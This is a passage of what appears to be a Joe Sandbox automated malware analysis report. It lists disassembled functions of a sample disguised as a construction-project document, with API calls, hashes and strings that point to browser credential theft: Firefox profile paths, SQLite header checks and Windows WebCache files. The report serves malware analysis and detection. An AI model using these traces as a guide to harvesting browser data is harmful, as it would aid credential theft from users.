                                                                                                                          • memset.MSVCRT ref: 00403C09
                                                                                                                          • memset.MSVCRT ref: 00403C1E
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                          • wcscat.MSVCRT ref: 00403C47
                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                          • wcscat.MSVCRT ref: 00403C70
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                          • API String ID: 1534475566-1174173950
                                                                                                                          • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                          • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                          Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                          Strings
                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                          • API String ID: 71295984-2036018995
                                                                                                                          • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                          • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                          Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • wcschr.MSVCRT ref: 00414458
                                                                                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                          • String ID: "%s"
                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                          • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                          • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                          Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                          Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004087D6
                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                          • memset.MSVCRT ref: 00408828
                                                                                                                          • memset.MSVCRT ref: 00408840
                                                                                                                          • memset.MSVCRT ref: 00408858
                                                                                                                          • memset.MSVCRT ref: 00408870
                                                                                                                          • memset.MSVCRT ref: 00408888
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2911713577-0
                                                                                                                          • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                          • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                          Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                          • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                          • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmp
                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                          • API String ID: 1475443563-3708268960
                                                                                                                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                          Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmpqsort
                                                                                                                          • String ID: /nosort$/sort
                                                                                                                          • API String ID: 1579243037-1578091866
                                                                                                                          • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                          • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                          Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040E60F
                                                                                                                          • memset.MSVCRT ref: 0040E629
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                          Strings
                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                          • API String ID: 2887208581-2114579845
                                                                                                                          • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                          • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                          Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3473537107-0
                                                                                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                          Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(02130048), ref: 0044DF01
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(02140050), ref: 0044DF11
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00626DB0), ref: 0044DF21
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(02140458), ref: 0044DF31
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 613200358-0
                                                                                                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                          Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                          • API String ID: 2221118986-1725073988
                                                                                                                          • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                          • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                          Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@DeleteObject
                                                                                                                          • String ID: r!A
                                                                                                                          • API String ID: 1103273653-628097481
                                                                                                                          • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                          • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                          Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1033339047-0
                                                                                                                          • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                          • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                          Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                          • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$memcmp
                                                                                                                          • String ID: $$8
                                                                                                                          • API String ID: 2808797137-435121686
                                                                                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                          Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
